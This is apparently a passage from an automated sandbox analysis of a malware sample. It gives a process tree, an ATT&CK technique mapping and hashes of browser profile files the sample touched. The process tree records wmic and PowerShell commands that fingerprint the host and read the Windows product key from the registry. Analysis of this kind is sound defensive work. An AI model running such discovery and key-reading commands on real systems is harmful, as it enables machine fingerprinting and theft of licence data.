      wmic computersystem get totalphysicalmemory
      4⤵
      PID:6108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4344
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:5024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:5696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:5196
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1996

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5804

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:5812
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:356
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="356.0.1067025253\226028981" -parentBuildID 20221007134813 -prefsHandle 1688 -prefMapHandle 1680 -prefsLen 20936 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d41d45d0-445a-49e5-adaf-bc4c49958468} 356 "\\.\pipe\gecko-crash-server-pipe.356" 1764 1e9002d8b58 gpu
    3⤵
    PID:3160
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="356.1.861079936\1784086455" -parentBuildID 20221007134813 -prefsHandle 2100 -prefMapHandle 2096 -prefsLen 21017 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5e553b4-041d-44a9-bef9-9ba4e893ffd2} 356 "\\.\pipe\gecko-crash-server-pipe.356" 2120 1e9000fa458 socket
    3⤵
    PID:888
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="356.2.2011179630\1595775729" -childID 1 -isForBrowser -prefsHandle 2812 -prefMapHandle 2596 -prefsLen 21055 -prefMapSize 232675 -jsInitHandle 1344 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {af8533b3-d0f6-4628-a660-51e7f7d56ad5} 356 "\\.\pipe\gecko-crash-server-pipe.356" 2832 1e9043ad058 tab
    3⤵
    PID:2444
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="356.3.636860376\2085751804" -childID 2 -isForBrowser -prefsHandle 3408 -prefMapHandle 3404 -prefsLen 26480 -prefMapSize 232675 -jsInitHandle 1344 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {365e61b6-8f7f-4ce8-aa8c-dc5d13b3f649} 356 "\\.\pipe\gecko-crash-server-pipe.356" 3416 1e905160e58 tab
    3⤵
    PID:2208
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="356.4.28320552\1010154887" -childID 3 -isForBrowser -prefsHandle 4300 -prefMapHandle 4296 -prefsLen 26539 -prefMapSize 232675 -jsInitHandle 1344 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {491334da-8313-406c-b63e-62175593ddc4} 356 "\\.\pipe\gecko-crash-server-pipe.356" 4308 1e905276e58 tab
    3⤵
    PID:532
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="356.6.16895830\752597066" -childID 5 -isForBrowser -prefsHandle 5012 -prefMapHandle 5016 -prefsLen 26539 -prefMapSize 232675 -jsInitHandle 1344 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {93c6d08f-1a01-49a9-830a-82b32b57e065} 356 "\\.\pipe\gecko-crash-server-pipe.356" 4840 1e905276b58 tab
    3⤵
    PID:4356
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="356.7.411428642\467729811" -childID 6 -isForBrowser -prefsHandle 4536 -prefMapHandle 4812 -prefsLen 26539 -prefMapSize 232675 -jsInitHandle 1344 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {79c7adcb-e5af-41c4-a0ec-d38965327f8e} 356 "\\.\pipe\gecko-crash-server-pipe.356" 5112 1e90703c258 tab
    3⤵
    PID:5224
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="356.5.7802316\1985852993" -childID 4 -isForBrowser -prefsHandle 4860 -prefMapHandle 4864 -prefsLen 26539 -prefMapSize 232675 -jsInitHandle 1344 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {652fd5df-884c-433f-bb0e-1f933d7b0d21} 356 "\\.\pipe\gecko-crash-server-pipe.356" 4848 1e905279858 tab
    3⤵
    PID:5760
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="356.8.1221557529\1665718786" -childID 7 -isForBrowser -prefsHandle 3868 -prefMapHandle 5524 -prefsLen 26539 -prefMapSize 232675 -jsInitHandle 1344 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4b3acf07-a9ca-4426-9663-7600d440ffaf} 356 "\\.\pipe\gecko-crash-server-pipe.356" 5612 1e908629758 tab
    3⤵
    PID:2428
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="356.9.925180112\1247698365" -childID 8 -isForBrowser -prefsHandle 4452 -prefMapHandle 4448 -prefsLen 26714 -prefMapSize 232675 -jsInitHandle 1344 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {570493d6-d6cc-4410-aa51-cec1fa1af4aa} 356 "\\.\pipe\gecko-crash-server-pipe.356" 6248 1e904bf8758 tab
    3⤵
    PID:2448
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="356.10.613970777\41699553" -childID 9 -isForBrowser -prefsHandle 6376 -prefMapHandle 6380 -prefsLen 26714 -prefMapSize 232675 -jsInitHandle 1344 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a10e66c8-db92-443d-9c28-3bba453bc950} 356 "\\.\pipe\gecko-crash-server-pipe.356" 6368 1e904bf9c58 tab
    3⤵
    PID:6056
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="356.11.1940912304\1584544116" -childID 10 -isForBrowser -prefsHandle 2648 -prefMapHandle 4692 -prefsLen 27058 -prefMapSize 232675 -jsInitHandle 1344 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d7a20a99-c2bb-4bf1-8013-9450fa2883a1} 356 "\\.\pipe\gecko-crash-server-pipe.356" 2640 1e908b7e258 tab
    3⤵
    PID:5696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
edf00450ffdd9b239cb0f8ad7d0331ef

SHA1
de0635e6a65f20b97553e2c34bf0f417e5cb127b

SHA256
e1469f96baded30a75ab97097271473524f074cb56b7c81e47d82bcdbdb41eb9

SHA512
ba51659c180f7440a2c0860ac9abdc6213cf213da5862eec6a3c4d2d9018d1e8ae0faf33bcaa464d357e13632ccbd3e44f088c97d4c03b27da8ffe51c2bd8e71

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\000\t\Paths\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\MANIFEST-000001

Filesize
23B

MD5
3fd11ff447c1ee23538dc4d9724427a3

SHA1
1335e6f71cc4e3cf7025233523b4760f8893e9c9

SHA256
720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed

SHA512
10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
38a4f84c7f868a1e090592eab440dc06

SHA1
c496feb1141d73ca809b91e1638f650d7fd31018

SHA256
0019959c2e7a91ee77b8f56090c0f88fa6d4aa23ae20e5b48aeffeb120555d9d

SHA512
5adae92947d86b8ac1063f0f84c44a6a270c83bfcf05fba7540eb7fe4693e05854b8f86783e2eb406f6044adf3e1bb554c4c8a5f437424704101f6eca0545020

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
874B

MD5
69f444be26c57eee5a0502a5daa4c397

SHA1
bdc0611ae460522a4025c51ccbd5e90133d20666

SHA256
90e8eda5ced0fef2a3645033923b04beacd770236247f50934ee31b4a8964e05

SHA512
681fd4a641ed20522bf7109b46f26b13d74b71cf0b9cac8a493870470808aa168ff96b11a882f9df042e663ec46402fdcaf4e828434f01ff52e66189f5fcdb65

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
4f7c9373bf0490602fd1523a405aa2c9

SHA1
97f7f4c1e7fb72efb9052cb934da3d1f90011b04

SHA256
1be9ffbbe0bda8f90461caa7515f7ac23560755fc45269a002239bf719dbdf09

SHA512
5257f67042a35f67fce94aeb3a4ff3bf83762c6128d778c9d8054d1e4c0676f5963cf9d02a152e3369d0c800a2e07aded22a8d885f0650ea948de8959c9c3f4a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
b24a8a26f0eb1f2286fa5768b46fd821

SHA1
449a8998df24594ba0dc536f71a3a14e777f5be5

SHA256
7e254f572dc17c0df6a7b053ca876503a4f3187757a4dc1259adbf777a8496ea

SHA512
564b2f9fdc79a69cde31ff203a4b93c3d169b36ed72a45fd2f50d6d0b33ca0f9d055813c06b7d578f20c5794e972be5b435e207c038ea7d0488ea546e8007554

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
408e1fc3b57e61c4287b05ffc4e49b60

SHA1
23e95df452ad66fd714e17c73fb15a11379796aa

SHA256
601cb8d56e0701c6d50324b82bb4e63dec99f0f784dd4aa0d285f7316cf1cae1

SHA512
0db02647436196dedfff5ee7c47a7d22c7833cb25298449a9ea670efd531e039fe4c995ede71bd601ea57793214e95271714ce8e891f9f40af910ec56ffa8897

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
fcce8ed0015376ac6753f4c4c2a4701d

SHA1
8c1e3d880e9d0f2b3f888903fb794b6b435da76f

SHA256
322bc3ff799215cf10a0f49342bb21bc3c5ca6cefee6dd1121951479ec7e4054

SHA512
428992ffe72cc14df6dd1c5c5d8bf9adb3ca685b4db2a5d1ce9af61e09b70a2097275efbecda8b5918a83e248adbf98616140c2f5f43dbe6ff63d18547b18cd8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
596dc9a149371684a9521b5bb838f263

SHA1
2547c8796b168da5aeb54be7b925edeadc8921a5

SHA256
6133f18693377c6fb85e034a60c048098c99a9991b927fc5996f185e043f4a9e

SHA512
61e2b05a15c2d6cde879bbb6d14411177cb0575af9aab3d20836f9c17e6fa95977110c0cebf307b7c548afe91ff117b0bba034778023c0dce6859a7688803e6a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
55efaa9c4052a6820cc0092f1d9555fb

SHA1
073d354ee451fe4493bc3f0c398f0355bd857f82

SHA256
974113ba975665a25fa3cd0f484e4a3c8b90bc11dc41b872bca7a5384eb27630

SHA512
e7be239508ef8ffa754bfd328fe640cdc81dae2616ef66a2dd5c388c126432a8eb9f8c6b96a6c2823d6c9b4adc9f39e9e48cc94104c7554a09943fc833b13a21

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\42fb363f-1fce-400d-833c-bef3336196ba\index-dir\the-real-index

Filesize
2KB

MD5
63661f284207d456dfebe2ca7def273d

SHA1
b434401b9bb930807caa3cfe328263161f79c3e1

SHA256
a1f3bea0e23e7a38365719264665e2fe805f8862bb4a12edd51fcc163527f342

SHA512
7c91e2c93765deb6f66f2175ac78e0d6d84edb5907bbac04569d2ae74544c03775ba37a40cdd9f3a6ff39d78f991d74683f479d0207585560eb95e92ecba9c06

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\42fb363f-1fce-400d-833c-bef3336196ba\index-dir\the-real-index

Filesize
2KB

MD5
3220f7a74bda0e9f17ee5aa46dcecebe

SHA1
b2aeb8ad935cacaf006ea1374aed4dfff069a340

SHA256
8ec4e344943c4b73880e064d00faab4caab116368f1629448b83a11faadaafd2

SHA512
9c2f28bea86838b46ed5ce6dcdb4db216ed7cf69a7bd12d2e62d7b789f40bba64219df260eb675c1d20b93151f34640b6205f7033d771e7369d3cda90edf77e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\42fb363f-1fce-400d-833c-bef3336196ba\index-dir\the-real-index~RFe580c8e.TMP

Filesize
48B

MD5
419b3adfcaaa0650204429e0fb86827c

SHA1
dd417840cc31e1ea43966118afef074b9b6012b3

SHA256
229eaff359400f2b55bdad970c14d5fda1bb02ca7bb4b07e7fa992f893a8da23

SHA512
3e34ed85d28fede01a978006ca56002dac5e4dd5235b74551656475e831bdc55fc7a36158342aaae75314cce2dc8a35410c1ff34b6079864b9d98d2f6a0e9a20

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\acf23b5a-ce23-4541-abaa-a29e688c4ed1\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\ccb87b89-2bbe-45fe-84b5-59f5defe5902\6ff3f0064834d6ed_0

Filesize
2KB

MD5
c39416efebc7d221c513bd14457bf95c

SHA1
2ce601d3e0b8760f5a13d87cffef5a7523da9b76

SHA256
0528ffe00a47d6df86ebeff3e6ffed93defa53c5ce9f78ded6ee083be7407905

SHA512
24263d090966de5a408057732bf8645195c8e354b7de6e956616bf7ce1623e0ef2ba80f5e1665a90a1c2c08585f9238e10b61326db08a2f133fb55da8b581d40

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\ccb87b89-2bbe-45fe-84b5-59f5defe5902\index-dir\the-real-index

Filesize
624B

MD5
b3f3ae258a8cbe245c22370bf233687e

SHA1
4f0cc5c27cf835851a32e171b8b209b3c725d27f

SHA256
03332e7bba78eba608da1cabdcfb97c38467c7fbebece8ab11219c6eab059b01

SHA512
a6f607302d2bccaf5d342fd62442e06ceeca7a56a74de79bdb1c3fa2660310fdf1a9d950dab258c8cfc51d75b46d52588afe0d246a732bf7d6a53978c0a0b1e7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\ccb87b89-2bbe-45fe-84b5-59f5defe5902\index-dir\the-real-index~RFe580635.TMP

Filesize
48B

MD5
d131ca2be5d3f631474096a69cfbe894

SHA1
db47b9449dbbb628d6848663e98a9208cadc9b5c

SHA256
52f86ac0b9cc15d96c517303498c9afba49552b438862c97b6f9423001a84847

SHA512
41d8eed1c6dde62e836af5c1204b5133468bc9799a8938cf8e30c07364e9610babf93b062dc37f7ea233cfc8462a7ef4d8f9f08b1418ede82abe523906210028

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
176B

MD5
e0de5cf5e70b59ba788b946b154cd433

SHA1
d99507274515b4278bec128b72742d4a911466fa

SHA256
a5f8eb1d812f194e3c646ed3548ca7c8f4eb9a562b91203b647c137a96355b4c

SHA512
85b4528902b95bdb3236520679b618e085c40e9b07afbd4c7b12430dbda9f880f99dc2b99bb4ada4c2f61a88a60658658cbf8aa8f1d0f2474f5fcfd4e8ac32bd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
112B

MD5
3ff7bdcae3e33dc86b104c3e66c2010b

SHA1
5aac8d4cc48cb181d2877185b201ca3b918790ed

SHA256
6b42adc35c72b92e0540f5ef3a76624bf7af7d1426afaac2673616181a96394f

SHA512
2a6263d3f6fd1019cf2e9377ddfe8b0be30f76e79211e912dc19b92959e805591f74b1a7eb8c4d060f06a66c9967619efd93d158875e2ca4ea286155e7cd85fb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
185B

MD5
f827ab3a14e3401c42ac6049072dfd6c

SHA1
81d1803816e0daedbe116faf60548b69599ecc25

SHA256
93619f2417c2e5f403d2aed2b0f84df7136d4786f329188465875fbedac72ff3

SHA512
e03bf77d86ffe32ab226686375eac6e41e3ff51b7a592ac25cdde3f4e25a26a7b6e0ff5378f2a1ac4d9d8fc23c9aa2332aa84b7a83e0dde1d094bfd104d42f7b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
183B

MD5
fcac44e9213c7a389074d9db0aef9182

SHA1
0431a1cf3fac948b722845eff19e00703dd42ff2

SHA256
27fab83df6c0240010162e14651ebc895dd2da9e0b700ae0e70dbd4f2100927c

SHA512
c24a59f1c3307a8b0f23a3a2c14dba63d37b27953c8f647168daa92542491d53644d17c8fb76eea122433609502b6e92b6697a4c85b9fd2bdd67691f8c44776a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
183B

MD5
bd7d93a2e2b0010619624df290d0cbd9

SHA1
599498d1917bea8a0751ecb810732822da9bfdbd

SHA256
2612a4bd2a4d0e88f03aa02fadc595ec263fae1db04bccbfce6b4d329c27ac0c

SHA512
7afc74b52981767eb20967e936b8e7abc3ce0f1e9daeb9544aad8abee513a4debf2d9e68c0e2078a324137ce9d7ce7e38943f1b6e78c0690a463eb387ebe4256

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
247B

MD5
c9c94bd15c39544411e57c6e97673522

SHA1
cf42ca64d70bd820f6a391d406838c44c7373f3d

SHA256
3473c962a42e66812e0e2370559555b8628749ee6c75e55bbe055c0f630a54eb

SHA512
36e1fd42b88094221d0d68336e53793e4655ccbbca7122f217d40436f5afb15c169fe1e62894feddaa82b6d2b5f57442066a8d298dc53d55caacf200c0cc4f7b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe57a884.TMP

Filesize
119B

MD5
29babdab4db512e883770f0092a21ba8

SHA1
e08171ea1ff02c8576043b0a6ef3288e3101d411

SHA256
2790aa3023a8306ea0cb50e6fe9fd2ea1bb3058b92247e44717220bfe60029dc

SHA512
b731f8930131b8ea5cb552d2c958d8ea7bda3dbf721d5c153aae45462968c59cc56e7741be659132df47609d22c271e13353d5f7e6beafb347b67df89ea43038

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
120B

MD5
5743fd06a3730638f45ed6f403168303

SHA1
0fb5b0e3b38113fe17e96a9db367c65c30e41622

SHA256
2e32299651b4ce3e1398cdb9c5d52498b195c359a5fd2845d13fbac2e3d2e9bb

SHA512
8e63b2b8472aecc24d6ea9a83afbc139af1f5338ff084720f289ae0e0591fcffb9f50432c43ef2acb761226c34439a755bec0b755041287e40185f0ca336c4cd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5840ae.TMP

Filesize
48B

MD5
c05dae8a9297f749ddb543b6189250f2

SHA1
ecdf137dd2edb4132693cced2088aef5dca311b1

SHA256
de86d817b75234ed64b0e5b38d58c54f14f9867c38e1fda9818fd2c18ca54502

SHA512
09104ce5de1cdef65f96198df6251149cb8cced234e3243e7b80d54045594540b2ff7c536a53041b3429d3be0c856088a038515f7aeaf5265d880efa4c54b7b2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Shortcuts Menu Icons\Monochrome\1\512.png

Filesize
10KB

MD5
7f57c509f12aaae2c269646db7fde6e8

SHA1
969d8c0e3d9140f843f36ccf2974b112ad7afc07

SHA256
1d5c9f67fe93f9fcc1a1b61ebc35bda8f98f1261e5005ae37af71f42aab1d90f

SHA512
3503a0f4939bed9e1fd5e086b17d6de1063220dffdab2d2373aa9582a2454a9d8f18c1be74442f4e597bdba796d2d69220bd9e6be632a15367225b804187ea18

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir3032_1327754204\Shortcuts Menu Icons\Monochrome\0\512.png

Filesize
2KB

MD5
12a429f9782bcff446dc1089b68d44ee

SHA1
e41e5a1a4f2950a7f2da8be77ca26a66da7093b9

SHA256
e1d7407b07c40b5436d78db1077a16fbf75d49e32f3cbd01187b5eaaa10f1e37

SHA512
1da99c5278a589972a1d711d694890f4fd4ec4e56f83781ab9dee91ba99530a7f90d969588fa24dce24b094a28bdecbea80328cee862031a8b289f3e4f38ce7a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
193KB

MD5
f7e1a0aadde74d26a964f70e01e5c31d

SHA1
831980667a2eea3ba7ddbc4ce3aedd3657b383f5

SHA256
1ebf05f1fcaf95771426ff63ba42d88a5b207b4573f0f564b14c6fdb03008952

SHA512
ec80357708c508de0f6b39467a861e0351af729f9ccd23e2b5284c1bcabe4c6b2ae7e885db3307e72073a3473ddf7177d53af3daf90099bfe77f2f38c7389c92

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
193KB

MD5
2b4f21b5cca3648f1de4b155dddad443

SHA1
d6e8ef4c643cc66c341f1dd3a884c4f86e7c3481

SHA256
0ff5e8712cc84a84e24b72ef47aad6d427e2b493b68185afccac28b702da8876

SHA512
da61c39ddd5310d68f147e5b2d5db1c4e28cd58fe9074540f409eb5104900927831d3cc6910c446f75e7ddf789fc99aa7b55eceb8d07a5499414283334edd333

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
192KB

MD5
a8924e64766373fa2e25dac5a462181b

SHA1
1c3cafe804a88739378a1f0c499ca0bf609d4c90

SHA256
613e152e63635c371430e52d562644abb7dd50ebd64212584bf93c86f1e2b043

SHA512
011ebf785685bc9ae8b6ef2d723204cda905f4aeb55c2bb53778e0f5524d5557888bf39419f5d8976fdaaed29c819be23bb24fe212d2837dd544050f84dd3115

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
277KB

MD5
8a619928884cb01d9b7af91f9a8c4431

SHA1
36c241a32021dd875ca7c905921e381dbe26655e

SHA256
a27f8c14db2919cf3352a587adf5ddd87901919d72034ab491e7f459da1d8c6c

SHA512
f2b980943c87ca2ea6b2e99e97a98ae0c1cda427615b6273a2e90496b59766323fe20106cc78a050ca37a892a5616a0721361c853fbd83ef4cf75bedf419dc08

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
101KB

MD5
0858a659f9f64f9510106350d30dcc39

SHA1
285b6bd37be446df15e0316d1319d4843c1f3000

SHA256
25d6303b9fa4b5f4b2ba1bee1e10ac663b956ee1b97d89a6de3a6f433e052de4

SHA512
47d775dabe513b0f032b59263045f476476590ede0ecbd6d9d9aacdb7e62dace7ebf8f43b42a639a3d90a220030638b121027413b170a7e45286bd1201b904a0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe585abd.TMP

Filesize
93KB

MD5
0498cd291317bcf3a23b5bf3cf7c05eb

SHA1
2b4940f7a061be1c5a7ced1667327b8c3d67eb1f

SHA256
f771706dfbc3f27674ed387ff3974dcd1daefdfa6b358ef071f3bbdcd1c72c8c

SHA512
1f238022fb10069be6bbcc67757986d61664e64b3088e716b302c1cd08ced2aaeef4208cfa7dac4cb7e571241684079481183e8de89bb1c4e7ffe15e4ccd3297

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
